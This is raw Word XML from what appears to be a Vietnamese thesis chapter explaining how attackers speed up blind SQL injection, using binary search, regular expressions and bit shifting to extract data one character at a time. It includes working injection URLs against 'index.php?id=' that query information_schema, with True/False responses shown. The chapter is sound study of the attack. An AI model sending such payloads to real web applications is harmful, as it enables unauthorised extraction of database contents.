          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong quá trình truy vấn, nếu kết quả trả về là đúng thì dừng lại. Trong bảng mã ASCII, có khoảng 94 ký tự nhìn thấy được, như vậy kẻ tấn công sẽ phải thực hiện gửi tối đa 94 yêu cầu cho một ký tự. Trên thế giới đã có nhiều kỹ thuật nhằm tối ưu hóa, giảm số lượng yêu cầu cần gửi xuống.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="00A409E0" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc458409283"/>
      <w:bookmarkStart w:id="49" w:name="_Toc458409353"/>
      <w:bookmarkStart w:id="50" w:name="_Toc458433479"/>
      <w:bookmarkStart w:id="51" w:name="_Toc459373896"/>
      <w:bookmarkStart w:id="52" w:name="_Toc459373956"/>
      <w:bookmarkStart w:id="53" w:name="_Toc459374329"/>
      <w:bookmarkStart w:id="54" w:name="_Toc459822502"/>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>
      <w:bookmarkEnd w:id="51"/>
      <w:bookmarkEnd w:id="52"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidRPr="00A409E0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tối ưu hóa sử dụng thuật toán tìm kiếm nhị phân</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Phương pháp này dựa trên thuật toán tìm kiếm nhị phân (Binary Search). Trong khoa học máy tính, thuật toán tìm kiếm nhị phân là một thuật toán dùng để tìm kiếm phần tử trong một danh sách đã được sắp xếp. Thuật toán hoạt động như sau: Trong mỗi bước, so sánh phần tử cần tìm với phần tử nằm ở chính giữa danh sách. Nếu hai phần tử bằng nhau thì phép tìm kiếm thành công và thuật toán kết thúc. Nếu chúng không bằng nhau thì tùy vào phần tử nào lớn hơn, thuật toán lặp lại bước so sánh trên với nửa đầu hoặc nửa sau của danh sách. Vì </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">số lượng phần tử trong danh sách cần xem xét giảm đi một nửa sau mỗi bước, nên thời gian thực thi của thuật toán là hàm lôgarit. Sau mỗi phép so sánh, số lượng phần tử trong danh sách cần xét giảm đi một nửa. Thuật toán kết thúc khi số lượng phần tử còn không quá 1. Vì vậy thời gian thực thi của thuật toán là </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
        </w:rPr>
        <w:t>O(logn)</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Có thể thấy rằng, </w:t>
      </w:r>
      <w:r w:rsidR="004601D9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> đang đi tìm giá trị của chữ cái trong tập danh sách các ký tự đã biết. Các ký tự này có thể sắp xếp, bằng cách chuyển đổi về giá trị trong bảng mã ASCII. Với khoảng 128 ký tự, trong đó có 94 ký tự dạng nhìn thấy được ( 2</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>&lt; 94 &lt; 2</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>), sau khi áp dụng phương pháp tìm kiếm nhị phân, chỉ cần khoảng 7 yêu cầu là có thể lấy được 1 ký tự. Tuy nhiên, phương pháp này có nhược điểm là phải thực hiện tuần tự 7 yêu cầu, vì kết quả yêu cầu trước sẽ quyết định nội dung của yêu cầu tiếp theo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F69FA" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="004F69FA">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37B627E2" wp14:editId="6224E663">
            <wp:extent cx="3060065" cy="18135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1"/>
                    <a:srcRect l="555" t="1359" r="989" b="1712"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3060065" cy="181356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55" w:name="_Toc459819439"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:t>Thuật toán tìm kiếm nhị phân</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc459822503"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Tối ưu hóa sử dụng Regex</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Được giới thiệu lần đầu tiên trong bài báo “Blind Sql Injection with Regular Expressions Attack” của Simone Quatrini và Marco Rondini, phương pháp này là một biến thể của phương pháp dựa trên tìm kiếm nhị phân ở trên, bằng cách sử dụng các biểu thức chính quy (regular expressions). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong ví dụ sau, </w:t>
      </w:r>
      <w:r w:rsidR="00BE2A5E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">luận văn sẽ trình bày </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>trích xuất lấy bản ghi đầu tiên trong bảng information_schema.tables. Với yêu cầu đầu tiên:</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12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rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables LIMIT 0,1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>Yêu cầu này dùng để kiểm tra có mắc lỗi Blind SQL injection hay không. Nếu trang trả về hợp lệ, thì có nghĩa là ứng dụng mắc lỗi (vì 1=1). Trong trường hợp này, bản ghi sẽ được bắt đầu bằng ký tự trong khoảng a-z, phương pháp sau sẽ cho thấy làm thế nào để trích xuất được:</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12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B59F4" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>a-n</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:t xml:space="preserve">]' LIMIT 0,1) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Tru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a-g</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:t xml:space="preserve">]' LIMIT 0,1) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Fals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h-n</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:t xml:space="preserve">]' LIMIT 0,1) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Tru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h-l</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:t xml:space="preserve">]' LIMIT 0,1) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Fals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m</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:t xml:space="preserve">' LIMIT 0,1) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">False </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>n</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:t xml:space="preserve">' LIMIT 0,1) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>True</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Như vậy ký tự đầu tiên là “n”. Phương pháp này là một biến thể của tìm kiếm nhị phân ở trên, thay vì sử dụng so sánh dạng mã ASCII thì phương pháp sử dụng các điều kiện của biểu thức chính quy. Nếu nằm trong khoảng giới hạn của biểu thức sẽ trả về True, nếu không sẽ trả về False. Sau mỗi lần yêu cầu, khoảng giới hạn lại được thu hẹp một nửa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Đối với hệ quản trị MySQL sẽ sử dụng hàm REGEXP, còn hệ quản trị MSSQL Server, sử dụng mệnh đề LIKE có chức năng tương tự. Một trong những vấn đề của phương pháp này đó là, việc sử dụng biểu thức chính quy trong mỗi hệ quản trị cơ sở dữ liệu là khác nhau, dẫn đến tương ứng từng loại cơ sở dữ liệu phải xây dựng mã tấn công riêng biệt, không thể dùng chung cho nhiều hệ quản trị cơ sở dữ liệu. Phương pháp này cũng giống như phương pháp </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>tìm kiếm nhị phân ở trên, không thể thực hiện được song song mà phải thực hiện tuần tự.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc459822504"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Tối ưu hóa sử dụng phương pháp dịch bit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Phương pháp thứ hai sử dụng kỹ thuật dịch bit (Bit Shifing). Mỗi ký tự đều tương ứng với một giá trị trong bảng mã ASCII. Giá trị này từ 0 đến 127 đối với hệ cơ số thập phân, nếu chuyển sang hệ nhị phân thì giá trị này sẽ được biểu diễn bằng 7 bit. Ví dụ sau đây, ký tự “a” có mã ASCII là 97, mã nhị phân sẽ là: 01100001. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E730B8" w:rsidRPr="00E730B8" w:rsidRDefault="00E730B8" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc459803830"/>
      <w:r w:rsidRPr="00E730B8">
        <w:t xml:space="preserve">Bảng </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="00313D3F">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Bảng \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="00E730B8">
        <w:t>: Minh họa tấn công sử dụng phương pháp tối ưu hóa bằng dịch bit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9044"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126"/>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="2409"/>
        <w:gridCol w:w="2808"/>
      </w:tblGrid>
      <w:tr w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidTr="005F5912">
        <w:trPr>
          <w:trHeight w:val="317"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126"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Mã nhị phân của “a”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701"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Số bit được dịch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409"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nhị phân</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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thập phân</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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">110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7</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r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">10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6</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1</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w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">0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5</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4667B">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pP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4667B">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidTr="005F5912">
        <w:trPr>
          <w:trHeight w:val="317"/>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w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">0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4</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11</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6</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w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">0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3</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11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2</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w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">0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2</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110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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidTr="005F5912">
        <w:trPr>
          <w:trHeight w:val="303"/>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w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">1 </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1</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11000</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0</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 xml:space="preserve">48 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidTr="005F5912">
        <w:trPr>
          <w:trHeight w:val="317"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126"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0</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240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110000</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2808"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97</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Lần lượt dịch bit, từ đó trích xuất ra được bit cần thiết của ký tự. Bit cần lấy chính là bit cuối cùng trong kết quả dạng nhị phân. Cần xác định bit này là 0, hay là 1. Thông thường, cách đơn giản nhất là chuyển kết quả sang dạng thập phân, rồi đem chia lấy phần dư cho 2. Nếu dư 1 thì bit đó là 1, dư 0 thì bit đó là 0</w:t>
      </w:r>
      <w:r w:rsidR="00BB59F4" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sử dụng kỹ thuật dịch bit cho phép lấy ra giá trị từng bit của ký tự. Với mỗi ký tự lúc này chỉ là 0 hoặc 1, nên chỉ cần 1 yêu cầu để xác định bit đó (Có phải 1 không ? Nếu không thì sẽ là 0). Với 7 bit sẽ cần 7 yêu cầu để xác định đúng chính xác ký tự.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">So với phương pháp tìm kiếm nhị phân, phương pháp dịch bit có ưu điểm cho phép thực hiện 7 yêu cầu không cần tuần tự, có thể thực hiện không song </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>song, độc lập với nhau. Tuy nhiên, nhược điểm là luôn cần 7 yêu cầu để lấy được một ký tự. Trong khi đối với các phương pháp dạng tìm kiếm, một số trường hợp có thể ít hơn 7 yêu cầu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc459822505"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Phương pháp tối ưu bằng cách dùng Bin2Pos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
